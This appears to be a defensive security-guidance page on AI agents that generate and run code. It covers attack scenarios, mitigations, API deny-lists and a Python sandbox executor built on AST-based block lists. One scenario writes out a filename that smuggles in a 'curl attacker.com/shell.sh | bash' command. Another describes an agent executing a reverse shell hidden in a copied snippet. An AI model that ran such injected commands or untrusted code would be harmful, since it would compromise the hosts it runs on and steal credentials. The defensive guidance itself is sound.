Unexpected Code Execution
Description
Agents generate and execute code — shell commands, Python scripts, SQL queries, or infrastructure-as-code — without adequate sandboxing, review, or restriction of dangerous operations.
Risk
Risk Overview
Code generation and execution is one of the most powerful and dangerous capabilities granted to agentic systems. Agents that can write and run code have effectively unlimited capability within their execution environment. When an agent generates a shell command, Python script, or database query and executes it, any error in the generated code — whether from hallucination, prompt injection, or logical mistakes — runs with the full privileges of the execution environment.
Attack Surface
- Shell command generation: Agents construct shell commands from natural language instructions, creating injection vectors through unsanitized inputs
- Script execution: Agents write and execute multi-line scripts that may import dangerous libraries, open network connections, or modify system state
- Dynamic code from untrusted context: Code snippets extracted from retrieved documents, emails, or web pages are executed without review
- Infrastructure-as-code generation: Agents producing Terraform, CloudFormation, or Kubernetes manifests that modify production infrastructure
- REPL persistence: Agents with persistent code execution environments accumulate state across invocations, enabling multi-step exploits
Business Impact
- Remote code execution: Attacker achieves arbitrary code execution on the agent's host through crafted inputs that influence generated code
- System compromise: Agent-generated scripts modify system configurations, install packages, or create persistent backdoors
- Data destruction: Generated database queries drop tables, truncate data, or corrupt records
- Credential theft: Generated code reads environment variables, configuration files, or secrets managers and transmits credentials externally
Attack Scenarios
A data analysis agent receives the instruction: 'Analyze the CSV file named report; curl attacker.com/shell.sh | bash; .csv'. The agent constructs a shell command incorporating the filename without sanitization, executing the attacker's payload as a side effect of the file operation.
An infrastructure agent is asked to 'set up a new staging environment.' It generates a Terraform configuration that creates the environment but also includes an overly permissive security group (0.0.0.0/0 on all ports) because it optimized for 'getting it working' rather than security. The configuration is applied without review, exposing the staging environment to the internet.
A coding assistant agent processes a user request that includes a code snippet from a Stack Overflow answer. The snippet contains an obfuscated reverse shell payload disguised as a utility function. The agent incorporates the snippet into its generated code and executes it, establishing a persistent connection to the attacker's command-and-control server.
Mitigations
Sandboxed Execution
All agent-generated code must run in isolated environments:
- Use container-based sandboxes (gVisor, Firecracker) with strict resource limits and no network access by default
- Mount filesystems read-only with write access only to a designated scratch directory
- Enforce execution timeouts to prevent infinite loops or resource exhaustion
- Drop all capabilities and run as an unprivileged user within the sandbox
- Destroy the sandbox after each execution — no state persistence between runs
Code Review Before Execution
Implement automated and human review gates:
- Parse generated code into an AST and check against a deny-list of dangerous operations before execution
- Flag code that imports networking libraries, subprocess modules, or file I/O outside approved paths
- Require human approval for code that modifies production systems, accesses secrets, or opens network connections
- Log all generated code with the prompt that produced it for post-hoc audit
Blocked Dangerous APIs
Maintain a deny-list of operations that generated code must never invoke:
- System calls:
exec,spawn,fork,system,popen - Network: raw socket creation, DNS resolution to external hosts, HTTP requests to non-allowlisted URLs
- Filesystem: writes outside sandbox, access to
/etc,/proc, home directories, or secrets paths - Package management:
pip install,npm install,apt-get, or any runtime dependency installation - Environment access: reading environment variables, accessing cloud metadata services (169.254.169.254)
Static Analysis Pipeline
Run generated code through security linters before execution:
- Use Semgrep or custom rules to detect command injection, path traversal, and SSRF patterns
- Check for hardcoded credentials, IP addresses, or suspicious URLs
- Verify all imports are from an approved module allowlist
- Reject code that uses eval(), exec(), compile(), or similar dynamic execution primitives
Code Examples
Sandboxed Executor with Deny-List
import ast
import subprocess
import tempfile
import os
from typing import Optional
from dataclasses import dataclass
BLOCKED_MODULES = {
"subprocess", "os", "sys", "shutil", "socket", "http",
"urllib", "requests", "ftplib", "smtplib", "ctypes",
"importlib", "pickle", "shelve", "code", "codeop",
"compile", "compileall",
}
BLOCKED_FUNCTIONS = {
"exec", "eval", "compile", "__import__", "globals",
"locals", "getattr", "setattr", "delattr", "open",
"breakpoint", "exit", "quit",
}
BLOCKED_ATTRIBUTES = {
"__subclasses__", "__bases__", "__class__", "__globals__",
"__code__", "__builtins__",
}
@dataclass
class ExecutionResult:
success: bool
output: str
errors: list[str]
blocked: bool
violations: list[str]
class SandboxedExecutor:
"""Validates and executes agent-generated code in isolation."""
def __init__(self, timeout_seconds: int = 30, max_output_bytes: int = 65536):
self._timeout = timeout_seconds
self._max_output = max_output_bytes
def execute(self, code: str) -> ExecutionResult:
# Static analysis first
violations = self._analyze_code(code)
if violations:
return ExecutionResult(
success=False,
output="",
errors=[],
blocked=True,
violations=violations,
)
# Execute in subprocess sandbox
return self._run_sandboxed(code)
def _analyze_code(self, code: str) -> list[str]:
violations = []
try:
tree = ast.parse(code)
except SyntaxError as e:
return [f"Syntax error: {e}"]
for node in ast.walk(tree):
# Check imports
if isinstance(node, ast.Import):
for alias in node.names:
root_module = alias.name.split(".")[0]
if root_module in BLOCKED_MODULES:
violations.append(f"Blocked import: {alias.name}")
elif isinstance(node, ast.ImportFrom):
if node.module:
root_module = node.module.split(".")[0]
if root_module in BLOCKED_MODULES:
violations.append(f"Blocked import from: {node.module}")
# Check function calls
elif isinstance(node, ast.Call):
if isinstance(node.func, ast.Name):
if node.func.id in BLOCKED_FUNCTIONS:
violations.append(f"Blocked function call: {node.func.id}")
# Check attribute access
elif isinstance(node, ast.Attribute):
if node.attr in BLOCKED_ATTRIBUTES:
violations.append(f"Blocked attribute access: {node.attr}")
return violations
def _run_sandboxed(self, code: str) -> ExecutionResult:
with tempfile.NamedTemporaryFile(
mode="w", suffix=".py", delete=False
) as f:
f.write(code)
script_path = f.name
try:
result = subprocess.run(
[
"python3", "-u",
"-I", # Isolated mode: no user site, no PYTHON* env vars
script_path,
],
capture_output=True,
text=True,
timeout=self._timeout,
env={"PATH": "/usr/bin:/bin"}, # Minimal environment
cwd="/tmp", # Restricted working directory
)
output = result.stdout[:self._max_output]
return ExecutionResult(
success=result.returncode == 0,
output=output,
errors=result.stderr.splitlines() if result.stderr else [],
blocked=False,
violations=[],
)
except subprocess.TimeoutExpired:
return ExecutionResult(
success=False,
output="",
errors=[f"Execution timed out after {self._timeout}s"],
blocked=False,
violations=[],
)
finally:
os.unlink(script_path)
Evidence Requirements
- Code execution audit logs capturing all generated code, AST analysis results, and sandbox outcomes
- Static analysis reports showing detected violations and blocked execution attempts
- Sandbox configuration audit confirming resource limits, network isolation, and filesystem restrictions
- Human approval workflow records for production-impacting code execution
- Red team exercise results testing sandbox escape and code injection vectors